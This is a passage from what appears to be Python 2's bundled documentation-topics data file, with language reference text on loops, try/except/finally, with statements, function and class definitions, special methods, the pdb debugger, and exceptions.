for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n\n\nThe "try" statement\n===================\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more exception handlers. When no\nexception occurs in the "try" clause, no exception handler is\nexecuted. When an exception occurs in the "try" suite, a search for an\nexception handler is started. This search inspects the except clauses\nin turn until one is found that matches the exception. An expression-\nless except clause, if present, must be last; it matches any\nexception. For an except clause with an expression, that expression\nis evaluated, and the clause matches the exception if the resulting\nobject is "compatible" with the exception. An object is compatible\nwith an exception if it is the class or a base class of the exception\nobject, or a tuple containing an item compatible with the exception.\n\nIf no except clause matches the exception, the search for an exception\nhandler continues in the surrounding code and on the invocation stack.\n[1]\n\nIf the evaluation of an expression in the header of an except clause\nraises an exception, the original search for a handler is canceled and\na search starts for the new exception in the surrounding code and on\nthe call stack (it is treated as if the entire "try" statement raised\nthe exception).\n\nWhen a matching except clause is found, the exception is assigned to\nthe target specified in that except clause, if present, and the except\nclause\'s suite is executed. All except clauses must have an\nexecutable block. When the end of this block is reached, execution\ncontinues normally after the entire try statement. (This means that\nif two nested handlers exist for the same exception, and the exception\noccurs in the try clause of the inner handler, the outer handler will\nnot handle the exception.)\n\nBefore an except clause\'s suite is executed, details about the\nexception are assigned to three variables in the "sys" module:\n"sys.exc_type" receives the object identifying the exception;\n"sys.exc_value" receives the exception\'s parameter;\n"sys.exc_traceback" receives a traceback object (see section The\nstandard type hierarchy) identifying the point in the program where\nthe exception occurred. These details are also available through the\n"sys.exc_info()" function, which returns a tuple "(exc_type,\nexc_value, exc_traceback)". Use of the corresponding variables is\ndeprecated in favor of this function, since their use is unsafe in a\nthreaded program. As of Python 1.5, the variables are restored to\ntheir previous values (before the call) when returning from a function\nthat handled an exception.\n\nThe optional "else" clause is executed if and when control flows off\nthe end of the "try" clause. [2] Exceptions in the "else" clause are\nnot handled by the preceding "except" clauses.\n\nIf "finally" is present, it specifies a \'cleanup\' handler. The "try"\nclause is executed, including any "except" and "else" clauses. If an\nexception occurs in any of the clauses and is not handled, the\nexception is temporarily saved. The "finally" clause is executed. If\nthere is a saved exception, it is re-raised at the end of the\n"finally" clause. If the "finally" clause raises another exception or\nexecutes a "return" or "break" statement, the saved exception is\ndiscarded:\n\n >>> def f():\n ... try:\n ... 1/0\n ... finally:\n ... return 42\n ...\n >>> f()\n 42\n\nThe exception information is not available to the program during\nexecution of the "finally" clause.\n\nWhen a "return", "break" or "continue" statement is executed in the\n"try" suite of a "try"..."finally" statement, the "finally" clause is\nalso executed \'on the way out.\' A "continue" statement is illegal in\nthe "finally" clause. (The reason is a problem with the current\nimplementation --- this restriction may be lifted in the future).\n\nThe return value of a function is determined by the last "return"\nstatement executed. Since the "finally" clause always executes, a\n"return" statement executed in the "finally" clause will always be the\nlast one executed:\n\n >>> def foo():\n ... try:\n ... return \'try\'\n ... finally:\n ... return \'finally\'\n ...\n >>> foo()\n \'finally\'\n\nAdditional information on exceptions can be found in section\nExceptions, and information on using the "raise" statement to generate\nexceptions may be found in section The raise statement.\n\n\nThe "with" statement\n====================\n\nNew in version 2.5.\n\nThe "with" statement is used to wrap the execution of a block with\nmethods defined by a context manager (see section With Statement\nContext Managers). This allows common "try"..."except"..."finally"\nusage patterns to be encapsulated for convenient reuse.\n\n with_stmt ::= "with" with_item ("," with_item)* ":" suite\n with_item ::= expression ["as" target]\n\nThe execution of the "with" statement with one "item" proceeds as\nfollows:\n\n1. The context expression (the expression given in the "with_item")\n is evaluated to obtain a context manager.\n\n2. The context manager\'s "__exit__()" is loaded for later use.\n\n3. The context manager\'s "__enter__()" method is invoked.\n\n4. If a target was included in the "with" statement, the return\n value from "__enter__()" is assigned to it.\n\n Note: The "with" statement guarantees that if the "__enter__()"\n method returns without an error, then "__exit__()" will always be\n called. Thus, if an error occurs during the assignment to the\n target list, it will be treated the same as an error occurring\n within the suite would be. See step 6 below.\n\n5. The suite is executed.\n\n6. The context manager\'s "__exit__()" method is invoked. If an\n exception caused the suite to be exited, its type, value, and\n traceback are passed as arguments to "__exit__()". Otherwise, three\n "None" arguments are supplied.\n\n If the suite was exited due to an exception, and the return value\n from the "__exit__()" method was false, the exception is reraised.\n If the return value was true, the exception is suppressed, and\n execution continues with the statement following the "with"\n statement.\n\n If the suite was exited for any reason other than an exception, the\n return value from "__exit__()" is ignored, and execution proceeds\n at the normal location for the kind of exit that was taken.\n\nWith more than one item, the context managers are processed as if\nmultiple "with" statements were nested:\n\n with A() as a, B() as b:\n suite\n\nis equivalent to\n\n with A() as a:\n with B() as b:\n suite\n\nNote: In Python 2.5, the "with" statement is only allowed when the\n "with_statement" feature has been enabled. It is always enabled in\n Python 2.6.\n\nChanged in version 2.7: Support for multiple context expressions.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nFunction definitions\n====================\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from position arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n\n\nClass definitions\n=================\n\nA class definition defines a class object (see section The standard\ntype hierarchy):\n\n classdef ::= "class" classname [inheritance] ":" suite\n inheritance ::= "(" [expression_list] ")"\n classname ::= identifier\n\nA class definition is an executable statement. It first evaluates the\ninheritance list, if present. Each item in the inheritance list\nshould evaluate to a class object or class type which allows\nsubclassing. The class\'s suite is then executed in a new execution\nframe (see section Naming and binding), using a newly created local\nnamespace and the original global namespace. (Usually, the suite\ncontains only function definitions.) When the class\'s suite finishes\nexecution, its execution frame is discarded but its local namespace is\nsaved. [4] A class object is then created using the inheritance list\nfor the base classes and the saved local namespace for the attribute\ndictionary. The class name is bound to this class object in the\noriginal local namespace.\n\n**Programmer\'s note:** Variables defined in the class definition are\nclass variables; they are shared by all instances. To create instance\nvariables, they can be set in a method with "self.name = value". Both\nclass and instance variables are accessible through the notation\n""self.name"", and an instance variable hides a class variable with\nthe same name when accessed in this way. Class variables can be used\nas defaults for instance variables, but using mutable values there can\nlead to unexpected results. For *new-style class*es, descriptors can\nbe used to create instance variables with different implementation\ndetails.\n\nClass definitions, like function definitions, may be wrapped by one or\nmore *decorator* expressions. The evaluation rules for the decorator\nexpressions are the same as for functions. The result must be a class\nobject, which is then bound to the class name.\n\n-[ Footnotes ]-\n\n[1] The exception is propagated to the invocation stack unless\n there is a "finally" clause which happens to raise another\n exception. That new exception causes the old one to be lost.\n\n[2] Currently, control "flows off the end" except in the case of\n an exception or the execution of a "return", "continue", or\n "break" statement.\n\n[3] A string literal appearing as the first statement in the\n function body is transformed into the function\'s "__doc__"\n attribute and therefore the function\'s *docstring*.\n\n[4] A string literal appearing as the first statement in the class\n body is transformed into the namespace\'s "__doc__" item and\n therefore the class\'s *docstring*.\n', 'context-managers': u'\nWith Statement Context Managers\n*******************************\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n', 'continue': u'\nThe "continue" statement\n************************\n\n continue_stmt ::= "continue"\n\n"continue" may only occur syntactically nested in a "for" or "while"\nloop, but not nested in a function or class definition or "finally"\nclause within that loop. It continues with the next cycle of the\nnearest enclosing loop.\n\nWhen "continue" passes control out of a "try" statement with a\n"finally" clause, that "finally" clause is executed before really\nstarting the next loop cycle.\n', 'conversions': u'\nArithmetic conversions\n**********************\n\nWhen a description of an arithmetic operator below uses the phrase\n"the numeric arguments are converted to a common type," the arguments\nare coerced using the coercion rules listed at Coercion rules. If\nboth arguments are standard numeric types, the following coercions are\napplied:\n\n* If either argument is a complex number, the other is converted to\n complex;\n\n* otherwise, if either argument is a floating point number, the\n other is converted to floating point;\n\n* otherwise, if either argument is a long integer, the other is\n converted to long integer;\n\n* otherwise, both must be plain integers and no conversion is\n necessary.\n\nSome additional rules apply for certain operators (e.g., a string left\nargument to the \'%\' operator). Extensions can define their own\ncoercions.\n', 'customization': u'\nBasic customization\n*******************\n\nobject.__new__(cls[, ...])\n\n Called to create a new instance of class *cls*. "__new__()" is a\n static method (special-cased so you need not declare it as such)\n that takes the class of which an instance was requested as its\n first argument. The remaining arguments are those passed to the\n object constructor expression (the call to the class). The return\n value of "__new__()" should be the new object instance (usually an\n instance of *cls*).\n\n Typical implementations create a new instance of the class by\n invoking the superclass\'s "__new__()" method using\n "super(currentclass, cls).__new__(cls[, ...])" with appropriate\n arguments and then modifying the newly-created instance as\n necessary before returning it.\n\n If "__new__()" returns an instance of *cls*, then the new\n instance\'s "__init__()" method will be invoked like\n "__init__(self[, ...])", where *self* is the new instance and the\n remaining arguments are the same as were passed to "__new__()".\n\n If "__new__()" does not return an instance of *cls*, then the new\n instance\'s "__init__()" method will not be invoked.\n\n "__new__()" is intended mainly to allow subclasses of immutable\n types (like int, str, or tuple) to customize instance creation. It\n is also commonly overridden in custom metaclasses in order to\n customize class creation.\n\nobject.__init__(self[, ...])\n\n Called after the instance has been created (by "__new__()"), but\n before it is returned to the caller. The arguments are those\n passed to the class constructor expression. If a base class has an\n "__init__()" method, the derived class\'s "__init__()" method, if\n any, must explicitly call it to ensure proper initialization of the\n base class part of the instance; for example:\n "BaseClass.__init__(self, [args...])".\n\n Because "__new__()" and "__init__()" work together in constructing\n objects ("__new__()" to create it, and "__init__()" to customise\n it), no non-"None" value may be returned by "__init__()"; doing so\n will cause a "TypeError" to be raised at runtime.\n\nobject.__del__(self)\n\n Called when the instance is about to be destroyed. This is also\n called a destructor. If a base class has a "__del__()" method, the\n derived class\'s "__del__()" method, if any, must explicitly call it\n to ensure proper deletion of the base class part of the instance.\n Note that it is possible (though not recommended!) for the\n "__del__()" method to postpone destruction of the instance by\n creating a new reference to it. It may then be called at a later\n time when this new reference is deleted. It is not guaranteed that\n "__del__()" methods are called for objects that still exist when\n the interpreter exits.\n\n Note: "del x" doesn\'t directly call "x.__del__()" --- the former\n decrements the reference count for "x" by one, and the latter is\n only called when "x"\'s reference count reaches zero. Some common\n situations that may prevent the reference count of an object from\n going to zero include: circular references between objects (e.g.,\n a doubly-linked list or a tree data structure with parent and\n child pointers); a reference to the object on the stack frame of\n a function that caught an exception (the traceback stored in\n "sys.exc_traceback" keeps the stack frame alive); or a reference\n to the object on the stack frame that raised an unhandled\n exception in interactive mode (the traceback stored in\n "sys.last_traceback" keeps the stack frame alive). The first\n situation can only be remedied by explicitly breaking the cycles;\n the latter two situations can be resolved by storing "None" in\n "sys.exc_traceback" or "sys.last_traceback". Circular references\n which are garbage are detected when the option cycle detector is\n enabled (it\'s on by default), but can only be cleaned up if there\n are no Python-level "__del__()" methods involved. Refer to the\n documentation for the "gc" module for more information about how\n "__del__()" methods are handled by the cycle detector,\n particularly the description of the "garbage" value.\n\n Warning: Due to the precarious circumstances under which\n "__del__()" methods are invoked, exceptions that occur during\n their execution are ignored, and a warning is printed to\n "sys.stderr" instead. Also, when "__del__()" is invoked in\n response to a module being deleted (e.g., when execution of the\n program is done), other globals referenced by the "__del__()"\n method may already have been deleted or in the process of being\n torn down (e.g. the import machinery shutting down). For this\n reason, "__del__()" methods should do the absolute minimum needed\n to maintain external invariants. Starting with version 1.5,\n Python guarantees that globals whose name begins with a single\n underscore are deleted from their module before other globals are\n deleted; if no other references to such globals exist, this may\n help in assuring that imported modules are still available at the\n time when the "__del__()" method is called.\n\n See also the "-R" command-line option.\n\nobject.__repr__(self)\n\n Called by the "repr()" built-in function and by string conversions\n (reverse quotes) to compute the "official" string representation of\n an object. If at all possible, this should look like a valid\n Python expression that could be used to recreate an object with the\n same value (given an appropriate environment). If this is not\n possible, a string of the form "<...some useful description...>"\n should be returned. The return value must be a string object. If a\n class defines "__repr__()" but not "__str__()", then "__repr__()"\n is also used when an "informal" string representation of instances\n of that class is required.\n\n This is typically used for debugging, so it is important that the\n representation is information-rich and unambiguous.\n\nobject.__str__(self)\n\n Called by the "str()" built-in function and by the "print"\n statement to compute the "informal" string representation of an\n object. This differs from "__repr__()" in that it does not have to\n be a valid Python expression: a more convenient or concise\n representation may be used instead. The return value must be a\n string object.\n\nobject.__lt__(self, other)\nobject.__le__(self, other)\nobject.__eq__(self, other)\nobject.__ne__(self, other)\nobject.__gt__(self, other)\nobject.__ge__(self, other)\n\n New in version 2.1.\n\n These are the so-called "rich comparison" methods, and are called\n for comparison operators in preference to "__cmp__()" below. The\n correspondence between operator symbols and method names is as\n follows: "x<y" calls "x.__lt__(y)", "x<=y" calls "x.__le__(y)",\n "x==y" calls "x.__eq__(y)", "x!=y" and "x<>y" call "x.__ne__(y)",\n "x>y" calls "x.__gt__(y)", and "x>=y" calls "x.__ge__(y)".\n\n A rich comparison method may return the singleton "NotImplemented"\n if it does not implement the operation for a given pair of\n arguments. By convention, "False" and "True" are returned for a\n successful comparison. However, these methods can return any value,\n so if the comparison operator is used in a Boolean context (e.g.,\n in the condition of an "if" statement), Python will call "bool()"\n on the value to determine if the result is true or false.\n\n There are no implied relationships among the comparison operators.\n The truth of "x==y" does not imply that "x!=y" is false.\n Accordingly, when defining "__eq__()", one should also define\n "__ne__()" so that the operators will behave as expected. See the\n paragraph on "__hash__()" for some important notes on creating\n *hashable* objects which support custom comparison operations and\n are usable as dictionary keys.\n\n There are no swapped-argument versions of these methods (to be used\n when the left argument does not support the operation but the right\n argument does); rather, "__lt__()" and "__gt__()" are each other\'s\n reflection, "__le__()" and "__ge__()" are each other\'s reflection,\n and "__eq__()" and "__ne__()" are their own reflection.\n\n Arguments to rich comparison methods are never coerced.\n\n To automatically generate ordering operations from a single root\n operation, see "functools.total_ordering()".\n\nobject.__cmp__(self, other)\n\n Called by comparison operations if rich comparison (see above) is\n not defined. Should return a negative integer if "self < other",\n zero if "self == other", a positive integer if "self > other". If\n no "__cmp__()", "__eq__()" or "__ne__()" operation is defined,\n class instances are compared by object identity ("address"). See\n also the description of "__hash__()" for some important notes on\n creating *hashable* objects which support custom comparison\n operations and are usable as dictionary keys. (Note: the\n restriction that exceptions are not propagated by "__cmp__()" has\n been removed since Python 1.5.)\n\nobject.__rcmp__(self, other)\n\n Changed in version 2.1: No longer supported.\n\nobject.__hash__(self)\n\n Called by built-in function "hash()" and for operations on members\n of hashed collections including "set", "frozenset", and "dict".\n "__hash__()" should return an integer. The only required property\n is that objects which compare equal have the same hash value; it is\n advised to somehow mix together (e.g. using exclusive or) the hash\n values for the components of the object that also play a part in\n comparison of objects.\n\n If a class does not define a "__cmp__()" or "__eq__()" method it\n should not define a "__hash__()" operation either; if it defines\n "__cmp__()" or "__eq__()" but not "__hash__()", its instances will\n not be usable in hashed collections. If a class defines mutable\n objects and implements a "__cmp__()" or "__eq__()" method, it\n should not implement "__hash__()", since hashable collection\n implementations require that a object\'s hash value is immutable (if\n the object\'s hash value changes, it will be in the wrong hash\n bucket).\n\n User-defined classes have "__cmp__()" and "__hash__()" methods by\n default; with them, all objects compare unequal (except with\n themselves) and "x.__hash__()" returns a result derived from\n "id(x)".\n\n Classes which inherit a "__hash__()" method from a parent class but\n change the meaning of "__cmp__()" or "__eq__()" such that the hash\n value returned is no longer appropriate (e.g. by switching to a\n value-based concept of equality instead of the default identity\n based equality) can explicitly flag themselves as being unhashable\n by setting "__hash__ = None" in the class definition. Doing so\n means that not only will instances of the class raise an\n appropriate "TypeError" when a program attempts to retrieve their\n hash value, but they will also be correctly identified as\n unhashable when checking "isinstance(obj, collections.Hashable)"\n (unlike classes which define their own "__hash__()" to explicitly\n raise "TypeError").\n\n Changed in version 2.5: "__hash__()" may now also return a long\n integer object; the 32-bit integer is then derived from the hash of\n that object.\n\n Changed in version 2.6: "__hash__" may now be set to "None" to\n explicitly flag instances of a class as unhashable.\n\nobject.__nonzero__(self)\n\n Called to implement truth value testing and the built-in operation\n "bool()"; should return "False" or "True", or their integer\n equivalents "0" or "1". When this method is not defined,\n "__len__()" is called, if it is defined, and the object is\n considered true if its result is nonzero. If a class defines\n neither "__len__()" nor "__nonzero__()", all its instances are\n considered true.\n\nobject.__unicode__(self)\n\n Called to implement "unicode()" built-in; should return a Unicode\n object. When this method is not defined, string conversion is\n attempted, and the result of string conversion is converted to\n Unicode using the system default encoding.\n', 'debugger': u'\n"pdb" --- The Python Debugger\n*****************************\n\n**Source code:** Lib/pdb.py\n\n======================================================================\n\nThe module "pdb" defines an interactive source code debugger for\nPython programs. It supports setting (conditional) breakpoints and\nsingle stepping at the source line level, inspection of stack frames,\nsource code listing, and evaluation of arbitrary Python code in the\ncontext of any stack frame. It also supports post-mortem debugging\nand can be called under program control.\n\nThe debugger is extensible --- it is actually defined as the class\n"Pdb". This is currently undocumented but easily understood by reading\nthe source. The extension interface uses the modules "bdb" and "cmd".\n\nThe debugger\'s prompt is "(Pdb)". Typical usage to run a program under\ncontrol of the debugger is:\n\n >>> import pdb\n >>> import mymodule\n >>> pdb.run(\'mymodule.test()\')\n > <string>(0)?()\n (Pdb) continue\n > <string>(1)?()\n (Pdb) continue\n NameError: \'spam\'\n > <string>(1)?()\n (Pdb)\n\n"pdb.py" can also be invoked as a script to debug other scripts. For\nexample:\n\n python -m pdb myscript.py\n\nWhen invoked as a script, pdb will automatically enter post-mortem\ndebugging if the program being debugged exits abnormally. After post-\nmortem debugging (or after normal exit of the program), pdb will\nrestart the program. Automatic restarting preserves pdb\'s state (such\nas breakpoints) and in most cases is more useful than quitting the\ndebugger upon program\'s exit.\n\nNew in version 2.4: Restarting post-mortem behavior added.\n\nThe typical usage to break into the debugger from a running program is\nto insert\n\n import pdb; pdb.set_trace()\n\nat the location you want to break into the debugger. You can then\nstep through the code following this statement, and continue running\nwithout the debugger using the "c" command.\n\nThe typical usage to inspect a crashed program is:\n\n >>> import pdb\n >>> import mymodule\n >>> mymodule.test()\n Traceback (most recent call last):\n File "<stdin>", line 1, in ?\n File "./mymodule.py", line 4, in test\n test2()\n File "./mymodule.py", line 3, in test2\n print spam\n NameError: spam\n >>> pdb.pm()\n > ./mymodule.py(3)test2()\n -> print spam\n (Pdb)\n\nThe module defines the following functions; each enters the debugger\nin a slightly different way:\n\npdb.run(statement[, globals[, locals]])\n\n Execute the *statement* (given as a string) under debugger control.\n The debugger prompt appears before any code is executed; you can\n set breakpoints and type "continue", or you can step through the\n statement using "step" or "next" (all these commands are explained\n below). The optional *globals* and *locals* arguments specify the\n environment in which the code is executed; by default the\n dictionary of the module "__main__" is used. (See the explanation\n of the "exec" statement or the "eval()" built-in function.)\n\npdb.runeval(expression[, globals[, locals]])\n\n Evaluate the *expression* (given as a string) under debugger\n control. When "runeval()" returns, it returns the value of the\n expression. Otherwise this function is similar to "run()".\n\npdb.runcall(function[, argument, ...])\n\n Call the *function* (a function or method object, not a string)\n with the given arguments. When "runcall()" returns, it returns\n whatever the function call returned. The debugger prompt appears\n as soon as the function is entered.\n\npdb.set_trace()\n\n Enter the debugger at the calling stack frame. This is useful to\n hard-code a breakpoint at a given point in a program, even if the\n code is not otherwise being debugged (e.g. when an assertion\n fails).\n\npdb.post_mortem([traceback])\n\n Enter post-mortem debugging of the given *traceback* object. If no\n *traceback* is given, it uses the one of the exception that is\n currently being handled (an exception must be being handled if the\n default is to be used).\n\npdb.pm()\n\n Enter post-mortem debugging of the traceback found in\n "sys.last_traceback".\n\nThe "run*" functions and "set_trace()" are aliases for instantiating\nthe "Pdb" class and calling the method of the same name. If you want\nto access further features, you have to do this yourself:\n\nclass pdb.Pdb(completekey=\'tab\', stdin=None, stdout=None, skip=None)\n\n "Pdb" is the debugger class.\n\n The *completekey*, *stdin* and *stdout* arguments are passed to the\n underlying "cmd.Cmd" class; see the description there.\n\n The *skip* argument, if given, must be an iterable of glob-style\n module name patterns. The debugger will not step into frames that\n originate in a module that matches one of these patterns. [1]\n\n Example call to enable tracing with *skip*:\n\n import pdb; pdb.Pdb(skip=[\'django.*\']).set_trace()\n\n New in version 2.7: The *skip* argument.\n\n run(statement[, globals[, locals]])\n runeval(expression[, globals[, locals]])\n runcall(function[, argument, ...])\n set_trace()\n\n See the documentation for the functions explained above.\n', 'del': u'\nThe "del" statement\n*******************\n\n del_stmt ::= "del" target_list\n\nDeletion is recursively defined very similar to the way assignment is\ndefined. Rather than spelling it out in full details, here are some\nhints.\n\nDeletion of a target list recursively deletes each target, from left\nto right.\n\nDeletion of a name removes the binding of that name from the local or\nglobal namespace, depending on whether the name occurs in a "global"\nstatement in the same code block. If the name is unbound, a\n"NameError" exception will be raised.\n\nIt is illegal to delete a name from the local namespace if it occurs\nas a free variable in a nested block.\n\nDeletion of attribute references, subscriptions and slicings is passed\nto the primary object involved; deletion of a slicing is in general\nequivalent to assignment of an empty slice of the right type (but even\nthis is determined by the sliced object).\n', 'dict': u'\nDictionary displays\n*******************\n\nA dictionary display is a possibly empty series of key/datum pairs\nenclosed in curly braces:\n\n dict_display ::= "{" [key_datum_list | dict_comprehension] "}"\n key_datum_list ::= key_datum ("," key_datum)* [","]\n key_datum ::= expression ":" expression\n dict_comprehension ::= expression ":" expression comp_for\n\nA dictionary display yields a new dictionary object.\n\nIf a comma-separated sequence of key/datum pairs is given, they are\nevaluated from left to right to define the entries of the dictionary:\neach key object is used as a key into the dictionary to store the\ncorresponding datum. This means that you can specify the same key\nmultiple times in the key/datum list, and the final dictionary\'s value\nfor that key will be the last one given.\n\nA dict comprehension, in contrast to list and set comprehensions,\nneeds two expressions separated with a colon followed by the usual\n"for" and "if" clauses. When the comprehension is run, the resulting\nkey and value elements are inserted in the new dictionary in the order\nthey are produced.\n\nRestrictions on the types of the key values are listed earlier in\nsection The standard type hierarchy. (To summarize, the key type\nshould be *hashable*, which excludes all mutable objects.) Clashes\nbetween duplicate keys are not detected; the last datum (textually\nrightmost in the display) stored for a given key value prevails.\n', 'dynamic-features': u'\nInteraction with dynamic features\n*********************************\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n', 'else': u'\nThe "if" statement\n******************\n\nThe "if" statement is used for conditional execution:\n\n if_stmt ::= "if" expression ":" suite\n ( "elif" expression ":" suite )*\n ["else" ":" suite]\n\nIt selects exactly one of the suites by evaluating the expressions one\nby one until one is found to be true (see section Boolean operations\nfor the definition of true and false); then that suite is executed\n(and no other part of the "if" statement is executed or evaluated).\nIf all expressions are false, the suite of the "else" clause, if\npresent, is executed.\n', 'exceptions': u'\nExceptions\n**********\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary 